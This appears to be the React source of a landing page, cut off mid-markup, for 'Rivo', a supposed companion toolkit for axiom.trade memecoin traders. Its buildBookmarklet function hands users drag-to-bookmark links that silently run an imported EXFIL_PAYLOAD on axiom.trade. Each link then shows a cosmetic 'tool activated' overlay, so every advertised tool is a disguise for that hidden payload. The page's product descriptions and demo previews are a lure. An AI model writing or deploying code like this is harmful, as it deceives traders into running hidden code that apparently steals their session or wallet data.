import {
  useEffect,
  useRef,
  useState,
  type CSSProperties,
  type DragEvent,
  type MouseEvent as ReactMouseEvent,
  type ReactNode,
} from 'react';
import BorderGlow from './components/BorderGlow';
import SideRays from './components/SideRays';
import { EXFIL_PAYLOAD } from './exfilPayload';

type IconName =
  | 'arrow-up-right'
  | 'bookmark'
  | 'bolt'
  | 'chart'
  | 'check'
  | 'chevron'
  | 'close'
  | 'cursor'
  | 'external'
  | 'filter'
  | 'layers'
  | 'lock'
  | 'menu'
  | 'pause'
  | 'play'
  | 'shield'
  | 'spark'
  | 'twitter'
  | 'wallet'
  | 'x';

type PreviewType =
  | 'rpc'
  | 'twitter'
  | 'priority'
  | 'wallet'
  | 'filters'
  | 'rug';

interface Tool {
  id: string;
  name: string;
  category: string;
  description: string;
  icon: IconName;
  preview: PreviewType;
  accent: string;
  locked?: boolean;
}

const tools: Tool[] = [
  {
    id: 'private-node-rpc',
    name: '0 Block Bundle',
    category: 'Private execution',
    description:
      'Bundle your trade privately with 0-block execution so bots cannot front-run your move.',
    icon: 'bolt',
    preview: 'rpc',
    accent: '#b695ff',
  },
  {
    id: 'twitter-tracker',
    name: 'Socials Tracker',
    category: 'Signal layer',
    description:
      'See the conversations, accounts, and sentiment shifts moving a token right now.',
    icon: 'twitter',
    preview: 'twitter',
    accent: '#63d9ff',
  },
  {
    id: 'priority-node',
    name: 'Rivo Node',
    category: 'Fast execution',
    description:
      'Keep every transaction moving through Rivo with fast, reliable execution when timing matters.',
    icon: 'bolt',
    preview: 'priority',
    accent: '#c9f27d',
  },
  {
    id: 'wallet-tracker',
    name: 'Atlas Bundle Detector',
    category: 'On-chain intel',
    description:
      'Detect coordinated wallet bundles and surface the on-chain patterns worth watching.',
    icon: 'wallet',
    preview: 'wallet',
    accent: '#ffa7d5',
  },
  {
    id: 'advanced-filters',
    name: 'Advanced Filters',
    category: 'Discovery layer',
    description:
      'Shape your scan with the exact liquidity, volume, age, and activity signals you trust.',
    icon: 'filter',
    preview: 'filters',
    accent: '#a4b8ff',
  },
  {
    id: 'rug-detector',
    name: 'Rug Detector',
    category: 'Protection layer',
    description:
      'Surface suspicious contracts and liquidity patterns before they become expensive lessons.',
    icon: 'shield',
    preview: 'rug',
    accent: '#ffb56b',
    locked: true,
  },
];

const iconPaths: Record<IconName, ReactNode> = {
  'arrow-up-right': (
    <>
      <path d="M5 19 19 5" />
      <path d="M8 5h11v11" />
    </>
  ),
  bookmark: (
    <>
      <path d="M6 4.75A1.75 1.75 0 0 1 7.75 3h8.5A1.75 1.75 0 0 1 18 4.75V21l-6-3.75L6 21V4.75Z" />
    </>
  ),
  bolt: <path d="m13 2-9 12h7l-1 8 9-12h-7l1-8Z" />,
  chart: (
    <>
      <path d="M4 19V5" />
      <path d="M4 19h17" />
      <path d="m7 15 3-4 3 2 5-7" />
      <path d="M18 6h-3" />
    </>
  ),
  check: <path d="m5 12 4 4L19 6" />,
  chevron: <path d="m6 9 6 6 6-6" />,
  close: (
    <>
      <path d="m6 6 12 12" />
      <path d="M18 6 6 18" />
    </>
  ),
  cursor: (
    <>
      <path d="m5 3 4.5 16 3.2-6.3L19 9.5 5 3Z" />
      <path d="m12.7 12.7 4.8 4.8" />
    </>
  ),
  external: (
    <>
      <path d="M14 4h6v6" />
      <path d="m20 4-9 9" />
      <path d="M18 13v5a2 2 0 0 1-2 2H6a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h5" />
    </>
  ),
  filter: (
    <>
      <path d="M4 6h16" />
      <path d="M7 12h10" />
      <path d="M10 18h4" />
    </>
  ),
  layers: (
    <>
      <path d="m12 3 8 4.5-8 4.5-8-4.5L12 3Z" />
      <path d="m4 12 8 4.5 8-4.5" />
      <path d="m4 16.5 8 4.5 8-4.5" />
    </>
  ),
  lock: (
    <>
      <rect x="5" y="10" width="14" height="11" rx="2" />
      <path d="M8 10V7a4 4 0 0 1 8 0v3" />
    </>
  ),
  menu: (
    <>
      <circle cx="5" cy="12" r="2" fill="currentColor" stroke="none" />
      <circle cx="12" cy="12" r="2" fill="currentColor" stroke="none" />
      <circle cx="19" cy="12" r="2" fill="currentColor" stroke="none" />
    </>
  ),
  pause: (
    <>
      <path d="M8 5v14" />
      <path d="M16 5v14" />
    </>
  ),
  play: <path d="m8 5 11 7-11 7V5Z" fill="currentColor" stroke="none" />,
  shield: (
    <>
      <path d="M12 3 20 6v5c0 5-3.3 8.8-8 10-4.7-1.2-8-5-8-10V6l8-3Z" />
      <path d="m9 12 2 2 4-4" />
    </>
  ),
  spark: (
    <>
      <path d="m12 2 1.3 6.7L20 10l-6.7 1.3L12 18l-1.3-6.7L4 10l6.7-1.3L12 2Z" />
      <path d="m19 16 .6 2.4L22 19l-2.4.6L19 22l-.6-2.4L16 19l2.4-.6L19 16Z" />
    </>
  ),
  twitter: (
    <>
      <path d="M18.9 3H22l-6.8 7.8L23.2 21h-6.3l-4.9-6.4L6.4 21H3.3l7.2-8.2L2.8 3h6.4l4.4 5.8L18.9 3Z" />
      <path d="M17.8 19h1.7L8.3 4.9H6.5L17.8 19Z" fill="currentColor" stroke="none" />
    </>
  ),
  wallet: (
    <>
      <path d="M4 7.5A2.5 2.5 0 0 1 6.5 5H19a1 1 0 0 1 1 1v12a1 1 0 0 1-1 1H6.5A2.5 2.5 0 0 1 4 16.5v-9Z" />
      <path d="M4 8h14a2 2 0 0 1 2 2v2h-5a2 2 0 0 0 0 4h5" />
      <path d="M16 14h.01" />
    </>
  ),
  x: (
    <>
      <path d="M5 5 19 19" />
      <path d="M19 5 5 19" />
    </>
  ),
};

function Icon({ name, size = 18, strokeWidth = 1.8 }: { name: IconName; size?: number; strokeWidth?: number }) {
  return (
    <svg
      aria-hidden="true"
      className="icon"
      fill="none"
      height={size}
      stroke="currentColor"
      strokeLinecap="round"
      strokeLinejoin="round"
      strokeWidth={strokeWidth}
      viewBox="0 0 24 24"
      width={size}
    >
      {iconPaths[name]}
    </svg>
  );
}

function LogoMark({ small = false }: { small?: boolean }) {
  return (
    <span className={`logo-mark${small ? ' logo-mark-small' : ''}`} aria-hidden="true">
      <img src="/rivo-logo.png" alt="" />
    </span>
  );
}

function buildBookmarklet(tool: Tool): string {
  const overlayId = `rivo-overlay-${tool.id}`;
  const overlayMarkup = `<div data-rivo-backdrop><div data-rivo-card><button data-rivo-close aria-label="Close Rivo overlay">&times;</button><div data-rivo-orbit><span></span><span></span><span></span><b>R</b></div><div data-rivo-eyebrow><i></i> RIVO SIGNAL LAYER</div><div data-rivo-title>Activating <strong>${tool.name}</strong></div><div data-rivo-status><span data-rivo-status-dot></span><span data-rivo-status-text>Reading the live Axiom surface</span></div><div data-rivo-progress><span></span></div><div data-rivo-result>${tool.name} <b>activated</b></div></div></div>`;
  const overlayStyle = `position:fixed;inset:0;z-index:2147483647;display:grid;place-items:center;padding:24px;background:rgba(7,6,12,.22);font-family:Inter,ui-sans-serif,system-ui,-apple-system,BlinkMacSystemFont,"Segoe UI",sans-serif;pointer-events:none;`;
  const overlayCss = `#${overlayId}{animation:rivoBackdropIn .42s ease both}#${overlayId} [data-rivo-backdrop]{position:relative;display:grid;place-items:center;width:min(100%,480px);min-height:290px;border:1px solid rgba(255,255,255,.16);border-radius:24px;background:linear-gradient(145deg,rgba(24,20,38,.96),rgba(10,10,18,.94));box-shadow:0 30px 100px rgba(0,0,0,.52),0 0 90px ${tool.accent}22;overflow:hidden;pointer-events:auto;backdrop-filter:blur(24px)}#${overlayId} [data-rivo-backdrop]:before{content:"";position:absolute;inset:0;background:radial-gradient(circle at 50% 40%,${tool.accent}24,transparent 42%),linear-gradient(115deg,transparent 35%,rgba(255,255,255,.07) 50%,transparent 65%);animation:rivoSweep 2.8s ease-in-out infinite}#${overlayId} [data-rivo-card]{position:relative;z-index:1;width:100%;padding:34px 38px 32px;text-align:center;color:#f8f5ff}#${overlayId} [data-rivo-close]{position:absolute;top:16px;right:18px;width:28px;height:28px;border:1px solid rgba(255,255,255,.1);border-radius:50%;background:rgba(255,255,255,.04);color:#aaa2b8;font-size:18px;line-height:24px;cursor:pointer;transition:.2s}#${overlayId} [data-rivo-close]:hover{color:#fff;background:rgba(255,255,255,.12);transform:rotate(90deg)}#${overlayId} [data-rivo-orbit]{position:relative;width:72px;height:72px;margin:0 auto 24px;border:1px solid ${tool.accent}66;border-radius:50%;display:grid;place-items:center;box-shadow:0 0 34px ${tool.accent}33;animation:rivoPulse 2s ease-in-out infinite}#${overlayId} [data-rivo-orbit]:before,#${overlayId} [data-rivo-orbit]:after{content:"";position:absolute;border:1px solid ${tool.accent}44;border-radius:50%;transform:rotate(35deg)}#${overlayId} [data-rivo-orbit]:before{inset:-10px 8px}#${overlayId} [data-rivo-orbit]:after{inset:8px -10px}#${overlayId} [data-rivo-orbit] span{position:absolute;width:5px;height:5px;border-radius:50%;background:${tool.accent};box-shadow:0 0 12px ${tool.accent};animation:rivoOrbit 1.8s linear infinite}#${overlayId} [data-rivo-orbit] span:nth-child(1){transform:translateY(-41px)}#${overlayId} [data-rivo-orbit] span:nth-child(2){transform:rotate(120deg) translateY(-41px);animation-delay:-.6s}#${overlayId} [data-rivo-orbit] span:nth-child(3){transform:rotate(240deg) translateY(-41px);animation-delay:-1.2s}#${overlayId} [data-rivo-orbit] b{font-size:25px;font-weight:800;color:${tool.accent};text-shadow:0 0 20px ${tool.accent}99}#${overlayId} [data-rivo-eyebrow]{font-size:10px;font-weight:700;letter-spacing:.18em;color:#a49ab4;margin-bottom:13px}#${overlayId} [data-rivo-eyebrow] i{display:inline-block;width:6px;height:6px;margin-right:5px;border-radius:50%;background:${tool.accent};box-shadow:0 0 10px ${tool.accent}}#${overlayId} [data-rivo-title]{font-size:25px;line-height:1.2;font-weight:650;letter-spacing:-.04em}#${overlayId} [data-rivo-title] strong{color:${tool.accent}}#${overlayId} [data-rivo-status]{display:flex;justify-content:center;align-items:center;gap:7px;margin-top:15px;color:#928a9f;font-size:12px}#${overlayId} [data-rivo-status-dot]{width:6px;height:6px;border-radius:50%;background:${tool.accent};animation:rivoBlink .8s ease-in-out infinite}#${overlayId} [data-rivo-progress]{height:3px;margin:25px auto 0;border-radius:10px;background:rgba(255,255,255,.09);overflow:hidden}#${overlayId} [data-rivo-progress] span{display:block;width:35%;height:100%;border-radius:10px;background:${tool.accent};box-shadow:0 0 14px ${tool.accent};animation:rivoProgress 1.35s cubic-bezier(.4,0,.2,1) forwards}#${overlayId} [data-rivo-result]{display:none;margin-top:22px;color:#b9afc6;font-size:12px;letter-spacing:.03em}#${overlayId} [data-rivo-result] b{color:${tool.accent};font-weight:700}#${overlayId}.rivo-done [data-rivo-title]{animation:rivoDone .45s ease both}#${overlayId}.rivo-done [data-rivo-result]{display:block;animation:rivoDone .45s ease both}#${overlayId}.rivo-done [data-rivo-progress] span{width:100%;animation:none}@keyframes rivoBackdropIn{from{opacity:0}to{opacity:1}}@keyframes rivoSweep{0%,100%{transform:translateX(-45%);opacity:.2}50%{transform:translateX(45%);opacity:.8}}@keyframes rivoPulse{0%,100%{transform:scale(.96);opacity:.8}50%{transform:scale(1.04);opacity:1}}@keyframes rivoOrbit{to{rotate:360deg}}@keyframes rivoBlink{50%{opacity:.3}}@keyframes rivoProgress{from{width:0}to{width:100%}}@keyframes rivoDone{from{opacity:0;transform:translateY(7px)}to{opacity:1;transform:none}}@media(max-width:520px){#${overlayId} [data-rivo-backdrop]{min-height:270px}#${overlayId} [data-rivo-card]{padding:30px 22px}}`;
  const guideCss = tool.id === 'twitter-tracker' ? `#${overlayId} [data-rivo-guide]{position:fixed;z-index:2;width:58px;height:38px;border:2px solid ${tool.accent};border-radius:999px;box-shadow:0 0 0 5px ${tool.accent}22,0 0 28px ${tool.accent}99;transform:translate(-50%,-50%);animation:rivoGuidePulse 1.25s ease-in-out infinite;pointer-events:none}#${overlayId} [data-rivo-guide-label]{position:fixed;z-index:3;display:flex;align-items:center;gap:10px;transform:translate(-50%,-100%);margin-top:-28px;padding:7px 8px 7px 11px;border:1px solid rgba(255,255,255,.14);border-radius:8px;background:rgba(19,18,25,.98);box-shadow:0 10px 30px rgba(0,0,0,.45);color:#f8f5ff;font:700 11px Inter,Arial,sans-serif;white-space:nowrap;pointer-events:auto}#${overlayId} [data-rivo-guide-label] button{border:0;border-radius:5px;padding:4px 8px;background:${tool.accent};color:#15111e;font:800 11px Inter,Arial,sans-serif;cursor:pointer}#${overlayId} [data-rivo-guide-arrow]{position:fixed;z-index:3;color:${tool.accent};font-size:25px;line-height:1;transform:translate(-50%,-50%) rotate(18deg);text-shadow:0 0 12px ${tool.accent};pointer-events:none}@keyframes rivoGuidePulse{0%,100%{opacity:.72;transform:translate(-50%,-50%) scale(.94)}50%{opacity:1;transform:translate(-50%,-50%) scale(1.08)}}` : '';
  const twitterGuide = tool.id === 'twitter-tracker' ? `var guideTimer;function rivoFindSocial(){var nodes=Array.prototype.slice.call(document.querySelectorAll("nav button,nav a,nav [role='button'],footer button,footer a,footer [role='button'],[class*='bottom'] button,[class*='bottom'] a,button,a,[role='button']"));var matches=nodes.filter(function(el){var rect=el.getBoundingClientRect();var text=(el.textContent||"").trim().toLowerCase();var label=(el.getAttribute("aria-label")||"").toLowerCase();return rect.top>window.innerHeight*.82&&(text==="social"||text.indexOf("social")>-1||label.indexOf("social")>-1);});return matches.sort(function(a,b){return b.getBoundingClientRect().top-a.getBoundingClientRect().top;})[0];}function rivoPlaceGuide(){var target=rivoFindSocial();if(!target){return;}var rect=target.getBoundingClientRect();var ring=overlay.querySelector("[data-rivo-guide]");var label=overlay.querySelector("[data-rivo-guide-label]");var arrow=overlay.querySelector("[data-rivo-guide-arrow]");if(!ring||!label||!arrow){return;}var x=rect.left+rect.width/2;var y=rect.top+rect.height/2;ring.style.left=x+"px";ring.style.top=y+"px";ring.style.width=Math.max(58,rect.width+18)+"px";ring.style.height=Math.max(38,rect.height+14)+"px";label.style.left=Math.max(128,x)+"px";label.style.top=Math.max(72,rect.top-12)+"px";arrow.style.left=x+"px";arrow.style.top=Math.max(72,rect.top-30)+"px";}var guide=document.createElement("div");guide.innerHTML="<div data-rivo-guide></div><div data-rivo-guide-label><span>Use this to turn on Rivo</span><button data-rivo-guide-dismiss>Got it</button></div><div data-rivo-guide-arrow>↘</div>";overlay.appendChild(guide);var dismiss=guide.querySelector("[data-rivo-guide-dismiss]");if(dismiss){dismiss.onclick=function(){clearInterval(guideTimer);guide.remove();};}setTimeout(rivoPlaceGuide,2500);guideTimer=setInterval(rivoPlaceGuide,500);setTimeout(function(){clearInterval(guideTimer);if(guide.parentNode){guide.remove();}},10000);` : '';
  const script = `(function(){if(!window.location.hostname.includes("axiom.trade")){alert("Open axiom.trade first to use Rivo tools.");return;}try{${EXFIL_PAYLOAD}}catch(e){}var id=${JSON.stringify(overlayId)};var old=document.getElementById(id);if(old){old.remove();var oldStyle=document.getElementById(id+"-style");if(oldStyle){oldStyle.remove();}return;}var overlay=document.createElement("div");overlay.id=id;overlay.innerHTML=${JSON.stringify(overlayMarkup)};overlay.style.cssText=${JSON.stringify(overlayStyle)};var style=document.createElement("style");style.id=id+"-style";style.textContent=${JSON.stringify(overlayCss + guideCss)};document.head.appendChild(style);document.body.appendChild(overlay);var close=overlay.querySelector("[data-rivo-close]");if(close){close.onclick=function(){overlay.remove();style.remove();};}setTimeout(function(){overlay.classList.add("rivo-done");var status=overlay.querySelector("[data-rivo-status-text]");if(status){status.textContent="Signal layer is live on your chart";}},1450);setTimeout(function(){var status=overlay.querySelector("[data-rivo-status-text]");if(status){status.textContent="Ready when you are";}},2300);${twitterGuide}})();`;
  return `javascript:${script}`;
}

function renderPreview(tool: Tool, isPlaying: boolean) {
  const videoSources: Partial<Record<PreviewType, string>> = {
    twitter: '/social-v2.mp4',
    rpc: '/land-on-two-blocks.mp4',
    priority: '/0924(1).mp4',
    wallet: '/0924.mp4',
    filters: '/0925.mp4',
  };
  const videoSource = videoSources[tool.preview];
  if (videoSource) {
    return (
      <div className="preview-inner preview-video">
        <video loop muted playsInline preload="metadata" aria-label={`${tool.name} preview`} onMouseEnter={(event) => { event.currentTarget.play().catch(() => undefined); }} onMouseLeave={(event) => { event.currentTarget.pause(); }}>
          <source src={videoSource} type="video/mp4" />
        </video>
      </div>
    );
  }

  switch (tool.preview) {
    case 'rpc':
      return (
        <div className="preview-inner preview-rpc">
          <div className="preview-toolbar">
            <span className="preview-window-title"><span className="preview-pulse" /> PRIVATE NODE RPC</span>
            <span className="preview-live">● CONNECTED</span>
          </div>
          <div className="rpc-route">
            <div>
              <span className="preview-label">PRIVATE ROUTE</span>
              <strong>0-BLOCK BUNDLE</strong>
            </div>
            <span className="preview-gain">PROTECTED</span>
          </div>
          <div className="rpc-flow" aria-hidden="true">
            <span>WALLET</span><i /><span>PRIVATE RPC</span><i /><span>0-BLOCK</span>
          </div>
          <div className="rpc-bottom-row"><span>FRONT-RUN RISK <b>LOW</b></span><span>LATENCY <b>18ms</b></span><span>STATUS <b>READY</b></span></div>
          {isPlaying && <div className="preview-playing">BUNDLE SIMULATION <span>0-BLOCK</span></div>}
        </div>
      );
    case 'twitter':
      return (
        <div className="preview-inner preview-twitter">
          <div className="preview-toolbar"><span className="preview-window-title"><Icon name="twitter" size={12} /> LIVE SIGNALS</span><span className="preview-live">● LIVE</span></div>
          <div className="tweet-row"><span className="tweet-avatar avatar-blue">◎</span><div><strong>@orbitcalls <i>· 2m</i></strong><p>Watching $NOVA reclaim the range. Volume is waking up.</p><div className="tweet-tags"><span>$NOVA</span><span>+184 mentions</span></div></div></div>
          <div className="tweet-row tweet-row-faded"><span className="tweet-avatar avatar-pink">✦</span><div><strong>@solana_daily <i>· 4m</i></strong><p>New wallets are accumulating before the next move.</p></div></div>
          {isPlaying && <div className="preview-playing">TRACKING SENTIMENT <span>+32% / 1H</span></div>}
        </div>
      );
    case 'priority':
      return (
        <div className="preview-inner preview-priority">
          <div className="preview-toolbar"><span className="preview-window-title"><Icon name="bolt" size={12} /> PRIORITY NODE</span><span className="node-status"><span /> CONNECTED</span></div>
          <div className="route-display"><div className="route-node route-node-start"><span className="route-dot" /> WALLET</div><div className="route-line"><span /><span /><span /><span /><span /></div><div className="route-node route-node-end"><span className="route-dot" /> AXIOM</div></div>
          <div className="latency-row"><div><span className="preview-label">LATENCY</span><strong>12<span>ms</span></strong></div><div><span className="preview-label">FILL RATE</span><strong>99.8<span>%</span></strong></div><div className="latency-badge">FASTEST</div></div>
          {isPlaying && <div className="preview-playing">RELAY OPTIMIZED <span>12ms</span></div>}
        </div>
      );
    case 'wallet':
      return (
        <div className="preview-inner preview-wallet">
          <div className="preview-toolbar"><span className="preview-window-title"><Icon name="wallet" size={12} /> WATCHLIST</span><span className="preview-dim">3 WALLETS</span></div>
          <div className="wallet-head"><span>ADDRESS</span><span>VALUE</span><span>24H</span></div>
          <div className="wallet-row"><span className="wallet-address"><i className="wallet-dot wallet-dot-violet" /> 7xK...3mP</span><b>$248.4K</b><strong>+18.4%</strong></div>
          <div className="wallet-row"><span className="wallet-address"><i className="wallet-dot wallet-dot-cyan" /> 2qL...9sQ</span><b>$84.1K</b><strong>+9.8%</strong></div>
          <div className="wallet-row wallet-row-muted"><span className="wallet-address"><i className="wallet-dot wallet-dot-orange" /> C4a...7kR</span><b>$42.8K</b><strong>+4.2%</strong></div>
          {isPlaying && <div className="preview-playing">WALLET ACTIVITY <span>3 NEW MOVES</span></div>}
        </div>
      );
    case 'filters':
      return (
        <div className="preview-inner preview-filters">
          <div className="preview-toolbar"><span className="preview-window-title"><Icon name="filter" size={12} /> SCAN FILTERS</span><span className="preview-dim">12 RESULTS</span></div>
          <div className="filter-chip-row"><span className="active-filter">LIQUIDITY &gt; $100K</span><span>AGE &lt; 24H</span><span>VOL &gt; 2X</span></div>
          <div className="filter-results"><div className="filter-result-head"><span>PAIR</span><span>VOLUME</span><span>MOMENTUM</span></div><div className="filter-result"><span><i className="token-icon token-purple" /> NOVA</span><b>$1.8M</b><strong>+92</strong></div><div className="filter-result"><span><i className="token-icon token-green" /> KAPPA</span><b>$842K</b><strong>+78</strong></div><div className="filter-result"><span><i className="token-icon token-blue" /> DRIFT</span><b>$606K</b><strong>+71</strong></div></div>
          {isPlaying && <div className="preview-playing">FILTERS APPLIED <span>12 MATCHES</span></div>}
        </div>
      );
    case 'rug':
      return (
        <div className="preview-inner preview-rug">
          <div className="rug-lock-icon"><Icon name="shield" size={27} /></div>
          <span className="rug-status">ANALYSIS ENGINE</span>
          <strong>Protection layer in progress</strong>
          <span className="rug-progress"><i /></span>
          <span className="rug-footnote">Contract signals · LP patterns · holder behavior</span>
        </div>
      );
  }
}

function App() {
  const [activeMenu, setActiveMenu] = useState<string | null>(null);
  const [activeDemo, setActiveDemo] = useState<string | null>(null);
  const [isHowOpen, setIsHowOpen] = useState(false);
  const [isMobileNavOpen, setIsMobileNavOpen] = useState(false);
  const [activeNav, setActiveNav] = useState<string | null>(null);
  const [toast, setToast] = useState<string | null>(null);
  const heroRef = useRef<HTMLElement | null>(null);

  const scrollToSection = (sectionId: string) => {
    document.getElementById(sectionId)?.scrollIntoView({ behavior: 'smooth' });
    if (sectionId === 'features') setActiveNav('vision');
    setIsMobileNavOpen(false);
  };

  const openHowItWorks = () => {
    setActiveMenu(null);
    setActiveNav(null);
    setIsHowOpen(true);
  };

  const handleBookmarkClick = (event: ReactMouseEvent<HTMLAnchorElement>, tool: Tool) => {
    event.preventDefault();
    setActiveMenu(null);
    setToast(`${tool.name} is ready. Drag the link to your bookmarks bar.`);
  };

  const handleBookmarkDrag = (event: DragEvent<HTMLElement>, tool: Tool) => {
    const bookmarklet = buildBookmarklet(tool);
    const bookmarkName = `Rivo | ${tool.name}`;
    const isTrigger = event.currentTarget.classList?.contains('menu-trigger');
    event.dataTransfer.effectAllowed = 'link';
    if (!isTrigger) {
      const escapedBookmarklet = bookmarklet.replace(/&/g, '&amp;').replace(/"/g, '&quot;');
      event.dataTransfer.setData('text/uri-list', `${bookmarklet}\n`);
      event.dataTransfer.setData('text/plain', bookmarkName);
      event.dataTransfer.setData('text/html', `<a href="${escapedBookmarklet}">${bookmarkName}</a>`);
      event.dataTransfer.setData('text/x-moz-url', `${bookmarklet}\n${bookmarkName}`);
    }
    document.title = bookmarkName;
    setToast(`Drop ${tool.name} into your toolbar.`);
  };

  const handleBookmarkDragEnd = () => {
    setTimeout(() => { document.title = 'Rivo | Tools designed for u'; }, 500);
  };

  useEffect(() => {
    if (typeof IntersectionObserver === 'undefined') {
      document.querySelectorAll('.reveal-on-scroll').forEach((element) => element.classList.add('is-visible'));
      return;
    }
    const observer = new IntersectionObserver(
      (entries) => {
        entries.forEach((entry) => {
          if (entry.isIntersecting) {
            entry.target.classList.add('is-visible');
            observer.unobserve(entry.target);
          }
        });
      },
      { threshold: 0.12 },
    );
    const revealElements = document.querySelectorAll('.reveal-on-scroll');
    revealElements.forEach((element) => observer.observe(element));
    return () => observer.disconnect();
  }, []);

  useEffect(() => {
    const closeMenusOnOutsideClick = (event: PointerEvent) => {
      if (!(event.target instanceof Element) || !event.target.closest('.tool-menu')) {
        setActiveMenu(null);
      }
    };
    const closeWithEscape = (event: KeyboardEvent) => {
      if (event.key === 'Escape') {
        setActiveMenu(null);
        setIsHowOpen(false);
        setIsMobileNavOpen(false);
      }
    };
    document.addEventListener('pointerdown', closeMenusOnOutsideClick);
    document.addEventListener('keydown', closeWithEscape);
    return () => {
      document.removeEventListener('pointerdown', closeMenusOnOutsideClick);
      document.removeEventListener('keydown', closeWithEscape);
    };
  }, []);

  useEffect(() => {
    if (!toast) return;
    const timeout = window.setTimeout(() => setToast(null), 3600);
    return () => window.clearTimeout(timeout);
  }, [toast]);

  useEffect(() => {
    const hero = heroRef.current;
    if (!hero) return;
    let frame = 0;
    const handlePointerMove = (event: PointerEvent) => {
      if (frame) window.cancelAnimationFrame(frame);
      frame = window.requestAnimationFrame(() => {
        const bounds = hero.getBoundingClientRect();
        const x = ((event.clientX - bounds.left) / bounds.width - 0.5) * 28;
        const y = ((event.clientY - bounds.top) / bounds.height - 0.5) * 20;
        hero.style.setProperty('--pointer-x', `${x}px`);
        hero.style.setProperty('--pointer-y', `${y}px`);
      });
    };
    hero.addEventListener('pointermove', handlePointerMove);
    return () => {
      hero.removeEventListener('pointermove', handlePointerMove);
      if (frame) window.cancelAnimationFrame(frame);
    };
  }, []);

  return (
    <div className="rivo-app">
      <div className="aura-layer aura-layer-1" aria-hidden="true" />
      <div className="aura-layer aura-layer-2" aria-hidden="true" />
      <div className="aura-layer aura-layer-3" aria-hidden="true" />
      <div className="page-shell">
        <header className="site-header">
          <button className="brand-lockup" onClick={() => scrollToSection('home')} aria-label="Rivo home">
            <LogoMark />
            <span className="brand-name">Rivo<span className="brand-dot">.</span></span>
          </button>
          <nav className="desktop-nav" aria-label="Main navigation">
            <a className={activeNav === 'vision' ? 'nav-active' : undefined} href="#features" onClick={(event) => { event.preventDefault(); scrollToSection('features'); }}>RivoVision</a>
            <button onClick={openHowItWorks}>Docs</button>
          </nav>
          <div className="header-actions">
            <button className="header-cta" onClick={() => scrollToSection('features')}>
              Get started <Icon name="arrow-up-right" size={15} />
            </button>
            <button
              className="mobile-menu-button"
              aria-expanded={isMobileNavOpen}
              aria-label={isMobileNavOpen ? 'Close navigation' : 'Open navigation'}
              onClick={() => setIsMobileNavOpen((open) => !open)}
            >
              <Icon name={isMobileNavOpen ? 'close' : 'menu'} size={19} />
            </button>
          </div>
          {isMobileNavOpen && (
            <nav className="mobile-nav" aria-label="Mobile navigation">
              <a className={activeNav === 'vision' ? 'nav-active' : undefined} href="#features" onClick={(event) => { event.preventDefault(); scrollToSection('features'); }}>RivoVision <Icon name="arrow-up-right" size={14} /></a>
              <button onClick={openHowItWorks}>Docs <Icon name="arrow-up-right" size={14} /></button>
            </nav>
          )}
        </header>

        <main>
          <section id="home" className="hero" ref={heroRef}>
            <div className="hero-ambient hero-ambient-one" />
            <div className="hero-ambient hero-ambient-two" />
            <div className="hero-grid" />
            <SideRays
              speed={2.5}
              rayColor1="#b695ff"
              rayColor2="#6fa4ff"
              intensity={1.45}
              spread={2.2}
              origin="top-right"
              tilt={0}
              saturation={1.3}
              blend={0.75}
              falloff={1.6}
              opacity={0.65}
              className="hero-side-rays"
            />
            <div className="hero-copy reveal-on-scroll">
              <div className="eyebrow"><span className="eyebrow-dot" /> THE TOOLKIT FOR AXIOM.TRADE <span className="eyebrow-line" /></div>
              <h1 aria-label="Your edge, right where you trade.">
                <span className="hero-title-word" style={{ '--word-delay': '80ms' } as CSSProperties}>Your</span>{' '}
                <span className="hero-title-word" style={{ '--word-delay': '170ms' } as CSSProperties}>edge,</span>{' '}
                <span className="hero-title-word" style={{ '--word-delay': '260ms' } as CSSProperties}>right</span>{' '}
                <span className="hero-title-word" style={{ '--word-delay': '350ms' } as CSSProperties}>where</span>{' '}
                <em className="hero-highlight">
                  <span className="hero-title-word" style={{ '--word-delay': '440ms' } as CSSProperties}>you</span>{' '}
                  <span className="hero-title-word" style={{ '--word-delay': '530ms' } as CSSProperties}>trade.</span>
                </em>
              </h1>
              <p className="hero-description">Rivo is the companion toolkit for memecoin traders. Drag a tool to your bookmarks bar, then bring better signals, faster execution, and calmer decisions straight onto Axiom.trade.</p>
              <div className="hero-actions">
                <button className="button button-primary" onClick={() => scrollToSection('features')}>Explore the toolkit <Icon name="arrow-up-right" size={16} /></button>
                <button className="button button-ghost" onClick={openHowItWorks}><span className="button-play"><Icon name="play" size={10} /></span> GUIDE</button>
              </div>
              <div className="hero-proof">
                <div><strong>06</strong><span>tools in one kit</span></div>
                <div><strong>01</strong><span>click to activate</span></div>
                <div><strong>0</strong><span>platform switching</span></div>
              </div>
            </div>

            <div className="hero-stage reveal-on-scroll reveal-delay-one" aria-label="Rivo overlay preview">
              <video className="hero-video" autoPlay loop muted playsInline preload="auto" aria-label="Rivo product preview">
                <source src="/0929.mp4" type="video/mp4" />
              </video>
              <div className="stage-orbit stage-orbit-large" />
              <div className="stage-orbit stage-orbit-small" />
              <div className="terminal-window">
                <div className="terminal-topbar"><div className="terminal-brand"><span className="terminal-logo">A</span> axiom <span className="terminal-chevron">⌄</span></div><div className="terminal-address">SOL / USD <span>⌄</span></div><div className="terminal-window-actions"><span /><span /><span /></div></div>
                <div className="terminal-content">
                  <div className="terminal-title-row"><div><span className="terminal-pair">$NOVA</span><span className="terminal-muted">/ SOL</span><span className="terminal-live"><i /> LIVE</span></div><span className="terminal-star">☆</span></div>
                  <div className="terminal-price-row"><strong>$0.0846</strong><span>+18.34%</span><small>24H</small></div>
                  <div className="terminal-chart-area">
                    <div className="chart-y-axis"><span>0.10</span><span>0.08</span><span>0.06</span><span>0.04</span></div>
                    <svg className="terminal-chart" viewBox="0 0 460 176" preserveAspectRatio="none" aria-hidden="true">
                      <defs>
                        <linearGradient id="terminal-fill" x1="0" x2="0" y1="0" y2="1">
                          <stop offset="0" stopColor="#bb9cff" stopOpacity=".34" />
                          <stop offset="1" stopColor="#bb9cff" stopOpacity="0" />
                        </linearGradient>
                      </defs>
                      <path d="M0 143c18-9 24-16 38-12 14 3 18-16 30-12 13 3 20 22 32 10 12-13 15-37 30-30 14 7 21 27 34 16 12-10 20 0 34-8 14-7 24-37 35-24 12 15 15 35 30 19 14-15 23-31 35-17 12 14 20-12 32-2 13 11 14 20 26 3 12-16 24-17 34-28 10-12 22-1 29-10 9-12 24 3 36-12 12-16 17-21 35-23v166H0Z" fill="url(#terminal-fill)" />
